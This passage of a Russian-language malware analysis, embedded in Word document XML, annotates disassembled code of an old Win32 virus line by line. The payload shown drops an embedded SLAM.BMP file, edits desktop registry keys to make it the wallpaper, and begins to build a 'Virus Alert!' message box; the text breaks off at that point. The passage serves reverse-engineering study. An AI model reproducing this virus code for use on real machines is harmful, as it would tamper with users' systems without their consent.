    <w:p w14:paraId="7E266283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CODE:00401846                 push    eax                      ; lpFileName = "SLAM.BMP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E48E8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CODE:00401847                 mov     eax, ss:CreateFileA[ebp]  ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес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2A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CreateFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505FB5EF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CODE:0040184D                 call    eax                      ; CreateFileA("SLAM.BMP", GENERIC_WRITE, FILE_SHARE_READ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D380DF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                                                               ; NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703A5D6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Создает или открывает файл SLAM.BMP для записи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDA669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Файл будет создан в текущей директории (обычно директория</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5E64B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запущенного процесса или системная директория Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0CC3D" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F67FB2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CODE:0040184F                 cmp     eax, 0FFFFFFFFh          ; Проверить, был ли файл успешно создан</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319F8F4" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRPr="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; INVALID_HANDLE_VALUE = 0xFFFFFFFF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>означает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ошибку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76708BEB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CODE:00401852                 jz      locret_40192C             ; Если ошибка, выйти из функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0DF86" w14:textId="56B4AA0F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CODE:00401858                 mov     ss:dword_401ED9[ebp], eax ; Сохранить handle файла для дальнейшего использования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E211787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АНАЛИЗ: Файл SLAM.BMP будет создан в текущей рабочей директории процесса. Это может быть:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66907979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Директория, из которой был запущен зараженный файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90F238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Системная директория Windows (C:\Windows\System32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B40598C" w14:textId="06A93154" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- Директория пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1AA710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CODE:0040185E                 push    0                        ; lpOverlapped = NULL (синхронная запись)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587D299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CODE:00401860                 mov     eax, offset byte_401EDD  ; Адрес переменной для количества записанных байт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A723DB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CODE:00401865                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75174E17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lastRenderedPageBreak/>
        <w:t>CODE:00401867                 push    eax                      ; lpNumberOfBytesWritten (выходной параметр)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BB7C7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CODE:00401868                 push    0E6h                      ; nNumberOfBytesToWrite = 0xE6 (230 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>байт</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346604AA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Размер данных BMP файла, встроенных в вирус</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CDD083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CODE:0040186D                 mov     eax, offset dword_401F88 ; Адрес начала данных BMP в памяти вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC51ADE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CODE:00401872                 add     eax, ebp                  ; Реальный адрес с учетом delta offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A471FF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CODE:00401874                 push    eax                      ; lpBuffer = адрес данных BMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB5F1B8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CODE:00401875                 push    ss:dword_401ED9[ebp]      ; hFile = handle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SLAM.BMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806EE86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CODE:0040187B                 mov     eax, ss:WriteFile[ebp]   ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес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2A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WriteFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF93385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CODE:00401881                 call    eax                      ; WriteFile(hFile, lpBuffer, 230, lpNumberOfBytesWritten, NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A2891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Записывает 230 байт данных BMP в файл SLAM.BMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053325CF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Данные BMP встроены непосредственно в тело вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF436F" w14:textId="163E359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и находятся по адресу dword_401F88[ebp]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04340DD0" w14:textId="37BC8FEF" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ: Вирус содержит данные BMP файла (230 байт) непосредственно в своем теле. Это демонстрирует самодостаточность вируса - он не требует загрузки дополнительных файлов или данных из сети. BMP файл, вероятно, содержит простое изображение с надписью или логотипом, который будет использоваться как обои рабочего стола.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C02A380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Структура BMP файла (первые 14 байт - заголовок файла):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C475584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- 2 байта: сигнатура "BM" (0x42 0x4D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A89800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- 4 байта: размер файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DBF2F7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- 4 байта: зарезервировано</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836C353" w14:textId="3604EC0F" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- 4 байта: смещение до начала данных изображения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836E9B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CODE:00401883                 push    ss:dword_401ED9[ebp]     ; hObject = handle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB20307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CODE:00401889                 mov     eax, ss:CloseHandle[ebp] ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес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2A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CloseHandle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212AF7B1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CODE:0040188F                 call    eax                      ; CloseHandle(hFile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A709CE" w14:textId="086CF41B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Закрывает файл и освобождает ресурсы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E934E5E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Windows хранит настройки обоев рабочего стола в реестре в ключе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0716EF1C" w14:textId="4A3DC3F4" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_CURRENT_USER\Control Panel\Desktop. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вирус изменяет эти настройки программно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF2AB5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CODE:00401891                 mov     eax, offset dword_401EAB ; Адрес переменной для handle ключа реестра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37460E69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CODE:00401896                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A3B5E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CODE:00401898                 push    eax                      ; phkResult (выходной параметр - handle ключа)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44852326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lastRenderedPageBreak/>
        <w:t>CODE:00401899                 push    2                        ; samDesired = KEY_SET_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A23B4D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Требуемые права доступа: только установка значений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9D249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CODE:0040189B                 push    0                        ; ulOptions = 0 (стандартные опции)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D952824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CODE:0040189D                 mov     eax, (offset aIahscontrolPan+4) ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Смещение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строки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Control Panel\\Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E31BCF3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CODE:004018A2                 add     eax, ebp                 ; Реальный адрес строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AA83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CODE:004018A4                 push    eax                      ; lpSubKey = "Control Panel\\Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308536E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CODE:004018A5                 push    80000001h                ; hKey = HKEY_CURRENT_USER (0x80000001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01990B3A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Это предопределенный handle для раздела текущего пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67505D7A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CODE:004018AA                 mov     eax, ss:RegOpenKeyExA[ebp] ; Адрес функции RegOpenKeyExA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111EEE03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CODE:004018B0                 call    eax                      ; RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel\\Desktop",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D9C1D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0, KEY_SET_VALUE, &amp;phkResult)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB32A7B" w14:textId="3B7AF920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Открывает ключ реестра для изменения настроек обоев</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE49CD" w14:textId="1EE75ACB" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ: Путь "Control Panel\\Desktop" в реестре Windows содержит настройки рабочего стола, включая:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2174F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Wallpaper - путь к файлу обоев</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297529BC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TileWallpaper - режим отображения (мозаика или нет)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BB137" w14:textId="0ECEEAD7" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- WallpaperStyle - стиль отображения (центрирование, растяжение, мозаика)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB5B4E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CODE:004018B2                 push    2                        ; cbData = 2 (размер данных в байтах, включая нулевой терминатор)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A9667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CODE:004018B4                 mov     eax, offset a1           ; Смещение строки "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08C9CD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CODE:004018B9                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532BC4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CODE:004018BB                 push    eax                      ; lpData = "1" (строка с нулевым терминатором)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066CC9FB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CODE:004018BC                 push    1                        ; dwType = REG_SZ (строковый тип данных)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D56C9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CODE:004018BE                 push    0                        ; Reserved = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47472420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CODE:004018C0                 mov     eax, offset aTilewallpaper ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Смещение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строки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "TileWallpaper"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41C7E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CODE:004018C5                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699FA2F1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CODE:004018C7                 push    eax                      ; lpValueName = "TileWallpaper"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3ADB35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CODE:004018C8                 push    ss:dword_401EAB[ebp]      ; hKey = handle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>открытого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ключа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реестра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F84A0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CODE:004018CE                 mov     eax, ss:RegSetValueExA[ebp] ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес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2A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RegSetValueExA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DF812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CODE:004018D4                 call    eax                      ; RegSetValueExA(hKey, "TileWallpaper", 0, REG_SZ, "1", 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C627D1E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Устанавливает значение "TileWallpaper" = "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966B2AE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TileWallpaper = 1 означает, что обои должны отображаться в режиме мозаики</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B222B44" w14:textId="43E17B54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(повторение изображения по всему экрану, если оно меньше экрана)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F24D4E9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lastRenderedPageBreak/>
        <w:t>АНАЛИЗ: Параметр TileWallpaper определяет, будут ли обои отображаться в режиме мозаики:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6308B779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"0" - обои отображаются один раз (центрирование)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E9A67" w14:textId="60738C13" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- "1" - обои отображаются в режиме мозаики (повторение по всему экрану)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5B59F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CODE:004018D6                 push    2                        ; cbData = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E984003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CODE:004018D8                 mov     eax, offset a0           ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Смещение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строки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC8BA9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CODE:004018DD                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E67A55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CODE:004018DF                 push    eax                      ; lpData = "0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EFE19A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CODE:004018E0                 push    1                        ; dwType = REG_SZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE98C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CODE:004018E2                 push    0                        ; Reserved = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628D1BA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CODE:004018E4                 mov     eax, offset aWallpaperstyle ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Смещение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строки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "WallpaperStyle"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702C3EE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CODE:004018E9                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502368DC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CODE:004018EB                 push    eax                      ; lpValueName = "WallpaperStyle"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797AB33C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CODE:004018EC                 push    ss:dword_401EAB[ebp]      ; hKey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AF38A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CODE:004018F2                 mov     eax, ss:RegSetValueExA[ebp]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379DE0F5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CODE:004018F8                 call    eax                      ; RegSetValueExA(hKey, "WallpaperStyle", 0, REG_SZ, "0", 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECBD92A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Устанавливает значение "WallpaperStyle" = "0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D570902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WallpaperStyle = 0 означает центрирование обоев</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F016904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(противоречие с TileWallpaper = 1, но это может быть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF894F" w14:textId="7426AFBE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для обеспечения определенного режима отображения)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B317A7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АНАЛИЗ: Параметр WallpaperStyle определяет способ отображения обоев:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F1F56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"0" - центрирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1181EC87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- "1" - растяжение по всему экрану</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE3934" w14:textId="405BB90E" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- "2" - мозаика (аналогично TileWallpaper = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C25DCA" w14:textId="647BE2DE" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E449021" w14:textId="6A8E21BB" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc215414044"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Применение изменений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="536B3077" w14:textId="5C985845" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>После изменения настроек в реестре необходимо применить изменения через SystemParametersInfoA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536C4B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CODE:004018FA                 push    0                        ; uiParam = 0 (не используется)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7124838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CODE:004018FC                 mov     eax, offset aSlamBmp     ; Смещение строки "SLAM.BMP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D5D776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CODE:00401901                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B79D6A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CODE:00401903                 push    eax                      ; pvParam = "SLAM.BMP" (путь к файлу обоев)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EB34B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CODE:00401904                 push    0                        ; fWinIni = 0 (не обновлять INI файлы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0F82B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CODE:00401906                 push    14h                      ; uiAction = SPI_SETDESKWALLPAPER (0x14)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD851B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Константа, означающая установку обоев рабочего стола</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B781D78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CODE:00401908                 mov     eax, ss:SystemParametersInfoA[ebp] ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес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2A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SystemParametersInfoA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F7B6F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CODE:0040190E                 call    eax                      ; SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, "SLAM.BMP", 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF07F3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Применяет изменения и устанавливает обои рабочего стола</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0B8B7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на файл SLAM.BMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B0A3D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Эта функция обновляет реестр и немедленно применяет изменения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A8582F" w14:textId="1864A41F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к рабочему столу, чтобы пользователь сразу увидел новые обои</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723DD0AF" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRPr="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: SystemParametersInfoA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>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параметром</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SPI_SETDESKWALLPAPER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487BB2A0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1. Устанавливает значение "Wallpaper" в реестре в путь к файлу обоев</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C807113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2. Немедленно применяет изменения к рабочему столу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61511FA5" w14:textId="3D96E244" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>3. Обои отображаются сразу, без необходимости перезагрузки или перелогина</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D83C4" w14:textId="159F7551" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc215414045"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Отображение сообщения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="2C280047" w14:textId="623C3A60" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Завершающий этап payload - отображение MessageBox с информацией о вирусе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5354B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CODE:00401910                 push    30h                      ; uType = MB_ICONEXCLAMATION | MB_OK (0x30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A3FCF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Флаги типа диалогового окна:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EBF90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MB_ICONEXCLAMATION: показать иконку восклицательного знака</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7EF92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MB_OK: показать кнопку "OK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9EA256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CODE:00401912                 mov     eax, offset aVirusAlert  ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Смещение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строки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Virus Alert!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC67F1B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CODE:00401917                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2606FBB0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CODE:00401919                 push    eax                      ; lpCaption = "Virus Alert!" (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>заголовок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окна</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F25059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CODE:0040191A                 mov     eax, offset aWin32MayaC1998 ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Смещение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строки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
